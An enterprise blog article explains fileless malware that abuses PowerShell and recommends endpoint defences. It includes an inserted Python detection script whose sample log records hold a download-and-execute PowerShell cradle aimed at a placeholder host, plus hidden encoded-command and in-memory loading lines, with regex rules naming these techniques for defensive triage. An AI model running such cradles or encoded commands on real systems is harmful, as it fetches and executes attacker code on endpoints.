How to Stop Fileless Malware: A Deep Dive for Enterprises

How can enterprises stop fileless malware?

This is far from an idle question. Fileless malware constitutes one of the most pressing and dangerous threats enterprises face today. While ransomware and cryptocurrency mining malware continue to pose a serious digital risk to businesses, none compare to the potential of fileless malware.

So what is fileless malware? And how can adopting next-gen endpoint security help you stop fileless malware? Which capabilities should enterprises value more in preventing these attacks? We answer these questions and more.   

What is Fileless Malware?

Fileless malware describes a variety of cyber attacks which don’t operate in the same manner as traditional malware.

Traditional malware usually requires a malicious file to be downloaded onto the enterprise's network. From that file, the malware executes its code, achieves its goals, and spreads throughout the network.

Thankfully, most legacy endpoint security solutions utilize signature-based threat detection and prevention. This type of detection can discover malicious files on networks and remove them. However, fileless malware doesn't require a file download to operate, much to the peril of legacy endpoint security solutions.

Fileless malware can steal passwords, data, browsing history, and enterprise finances. Additionally, fileless malware can allow hackers to engage in lateral attacks, granting them an unmonitored foothold in your enterprise network. Furthermore, a fileless malware attack can disrupt business processes, commandeer endpoints, and conduct other kinds of digital infiltration.

How Does Fileless Malware Function?

Instead of dropping a file, fileless malware abuses native processes already present on your enterprise endpoints. Usually, this involves leveraging PowerShell, a task automation and configuration management framework. PowerShell can execute scripts entirely in memory, so an attack built on it needs no file written to disk in order to function.

At its core, fileless malware piggybacks on PowerShell as it runs its legitimate functions. In other words, these cyber attacks embed malicious scripts within the regular scripts. By doing so, hackers conceal their attacks, disguising them as extensions of normal processes.

PowerShell is a legitimate process on your endpoints. It handles routine administrative and maintenance-related tasks; you can't just turn it off (without causing serious damage to your processes). Moreover, its functions are considered normal baseline behaviors; they don't raise traditional endpoint security or behavior analytics alerts.

Additionally, you can't stop good actors from using the native processes hackers exploit in these cyber attacks. Thus, fileless malware exploits what essentially serve as perpetual backdoors into your networks. It leaves no footprints on disk, and any system reboot essentially erases whatever evidence of the attack lingers in memory.

How Common are Fileless Malware Attacks?

To understand how to stop fileless malware, you first need to understand how common fileless malware has become in recent years. Thankfully, several cybersecurity vendors and researchers explore the infection rates of this new breed of cyber attack. And not a moment too soon either; hackers have adopted fileless malware attacks only too readily.  

According to the Symantec Internet Security Threat Report for February 2019, malicious PowerShell script attacks rose over 1000% in 2018. Endpoint security solution provider Carbon Black found fileless malware accounts for more than 50% of successful enterprise breaches. 97% of their customers have experienced a fileless malware attack over the past two years. In particular, PowerShell accounts for 89% of fileless malware attacks.

Meanwhile, fellow endpoint security provider FireEye previously found 90% of blocked attacks contained malware-less threats. 81% of blocked fileless malware email attacks came in the form of phishing.

Ransomware and cryptojacking continue to battle for the position of top cyber attack. But fileless malware is on the rise, and many enterprises aren’t prepared for it.     

How to Stop Fileless Malware

To stop fileless malware, you need endpoint security capabilities specifically designed to help mitigate this family of cyber attacks. This requires a next-generation endpoint security solution; legacy endpoint protection platforms can’t keep up with the demands of modern hackers.

Here are the EPP capabilities you need to stop fileless malware:     

EDR

Endpoint detection and response (EDR) provides another layer of threat detection to your digital perimeter, allowing your solution to stop threats which circumvent your threat prevention. Through continuous monitoring, EDR can help detect fileless malware as it executes its malicious code.

Most next-gen endpoint security solutions possess EDR capabilities; Gartner ranked it as one of the most critical capabilities in EPP solutions.     

Phishing Prevention and Email Security

To stop fileless malware, you need to take steps to stop phishing attacks. As illustrated above, phishing attacks and fileless malware tend to go hand in hand. Your endpoint security solution should work to block as many phishing emails from entering your network as possible in the first place.

Phishing attacks exploit employees' ignorance of, and neglect of, cybersecurity best practices. The best way to prevent a critical mistake is to remove the possibility in the first place. Additionally, your endpoint security solution should help monitor incoming and outgoing network traffic to watch for potential intrusions.

Forensic Investigation

If you aim to stop fileless malware attacks, you need to investigate where the attack came from and how it exploited your processes. This requires extensive visibility into your entire network which only next-gen endpoint security can provide. Furthermore, it requires the ability to investigate—which includes the ability to track threat progression throughout the network accurately.   

Also, investigation requires maintaining and monitoring operations like Windows Management Instrumentation (WMI) and PowerShell to identify any unwanted task in real time.
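As an added example (not from the original article or any vendor's product), the following script shows the kind of real-time PowerShell monitoring this section and the earlier "How Does Fileless Malware Function?" section describe: it scores constructed PowerShell script block log records (Windows Event ID 4104) against a few well-known indicators of in-memory execution and raises alerts above a threshold. The record field names, rule set and weights are assumptions made for this illustration.

```python
import re

# Constructed PowerShell script block log records (Windows Event ID 4104),
# invented for this example; the field names are an assumption, not a schema.
SAMPLE_EVENTS = [
    {"host": "ws01", "script": "Get-Service | Where-Object Status -eq 'Running'"},
    {"host": "ws02", "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"host": "ws03", "script": "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -EncodedCommand QQBBAEEA"},
    {"host": "ws04", "script": "[System.Reflection.Assembly]::Load($bytes) | Out-Null"},
    {"host": "ws05", "script": "Get-ChildItem C:\\Logs -Filter *.log | Measure-Object"},
]

# Detection rules: (name, pattern, weight). Matching is case-insensitive
# because PowerShell is; weights are illustrative assumptions for this example.
RULES = [
    ("encoded_command", r"(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", 3),
    ("download_cradle", r"(?:IEX|Invoke-Expression).*?(?:DownloadString|DownloadFile|Invoke-WebRequest)", 4),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 1),
    ("policy_bypass", r"-ex(?:ecutionpolicy)?\s+bypass", 1),
    ("in_memory_assembly", r"\[System\.Reflection\.Assembly\]::Load\(", 3),
    ("wmi_subscription", r"__EventFilter|Register-WmiEvent|CommandLineEventConsumer", 3),
]
COMPILED = [(name, re.compile(pat, re.I), weight) for name, pat, weight in RULES]
ALERT_THRESHOLD = 3  # one strong indicator, or several weak ones together


def score_script(script):
    """Return (score, matched rule names) for one script block, in rule order."""
    hits = [name for name, rx, _ in COMPILED if rx.search(script)]
    score = sum(weight for name, _, weight in COMPILED if name in hits)
    return score, hits


def triage(events, threshold=ALERT_THRESHOLD):
    """Return one alert per event whose script block scores at or above threshold."""
    alerts = []
    for event in events:
        score, hits = score_script(event["script"])
        if score >= threshold:
            alerts.append({"host": event["host"], "score": score, "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"{alert['host']}: score={alert['score']} hits={', '.join(alert['hits'])}")
```

Routine administrative scripts (ws01, ws05) score zero, while the download cradle, the hidden encoded command and the in-memory assembly load each cross the threshold; in practice the rules would be tuned against your own baseline of normal PowerShell use.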

Patches and Upgrades

Your endpoint security solution must ensure your endpoints, processes, and applications receive proper patches and upgrades for as long as they remain a part of your IT environment. These patches and upgrades carry the essential threat intelligence necessary to stop fileless malware.

For example, the latest PowerShell version protects itself more adequately against fileless malware. Your enterprise cannot neglect patches—even a slight delay can result in a zero-day attack.

Plenty of next-gen endpoint security solutions offer endpoint management capabilities, including patch management, which helps your enterprise stay up to date with necessary upgrades.

You can learn more about how to stop fileless malware with endpoint security with our 2019 Buyer’s Guide. We explore the top vendors in the market and their key features, and we share our Bottom Line on each.

Ben Canner

Editor, Cybersecurity at Solutions Review
Ben Canner is an enterprise technology writer and analyst covering Identity Management, SIEM, Endpoint Protection, and Cybersecurity writ large. He holds a Bachelor of Arts Degree in English from Clark University in Worcester, MA. He previously worked as a corporate blogger and ghost writer. You can reach him via Twitter and LinkedIn.